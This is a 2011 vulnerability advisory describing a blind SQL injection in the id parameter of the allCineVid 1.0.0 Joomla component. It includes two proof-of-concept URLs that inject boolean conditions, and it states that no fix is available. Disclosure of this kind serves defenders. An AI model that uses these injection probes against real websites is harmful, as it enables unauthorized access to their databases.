66 lines
No EOL
1.4 KiB
Text
66 lines
No EOL
1.4 KiB
Text
http://adv.salvatorefresta.net/allCineVid_Joomla_Component_1.0.0_Blind_SQL_Injection_Vulnerability-18012011.txt
|
|
|
|
allCineVid Joomla Component 1.0.0 Blind SQL Injection Vulnerability
|
|
|
|
Name allCineVid
|
|
Vendor http://www.joomtraders.com
|
|
Versions Affected 1.0.0
|
|
|
|
Author Salvatore Fresta aka Drosophila
|
|
Website http://www.salvatorefresta.net
|
|
Contact salvatorefresta [at] gmail [dot] com
|
|
Date 2011-01-18
|
|
|
|
X. INDEX
|
|
|
|
I. ABOUT THE APPLICATION
|
|
II. DESCRIPTION
|
|
III. ANALYSIS
|
|
IV. SAMPLE CODE
|
|
V. FIX
|
|
|
|
|
|
I. ABOUT THE APPLICATION
|
|
________________________
|
|
|
|
allCineVid is a commercial Joomla's extension. It allows
|
|
you to add videos into your Joomla! website through the
|
|
use of modules and lightbox windows.
|
|
|
|
|
|
II. DESCRIPTION
|
|
_______________
|
|
|
|
A parameter is not properly sanitised before being used
|
|
in SQL queries.
|
|
|
|
|
|
III. ANALYSIS
|
|
_____________
|
|
|
|
Summary:
|
|
|
|
A) Blind SQL Injection
|
|
|
|
|
|
A) Blind SQL Injection
|
|
______________________
|
|
|
|
The id parameter is not properly sanitised before being
|
|
used in SQL queries. This can be exploited to manipulate
|
|
SQL queries by injecting arbitrary SQL code.
|
|
|
|
|
|
IV. SAMPLE CODE
|
|
_______________
|
|
|
|
A) Blind SQL Injection
|
|
|
|
http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=1
|
|
http://site/path/index.php?option=com_allcinevid&tmpl=component&id=1 and 1=0
|
|
|
|
|
|
V. FIX
|
|
______
|
|
|
|
No fix. |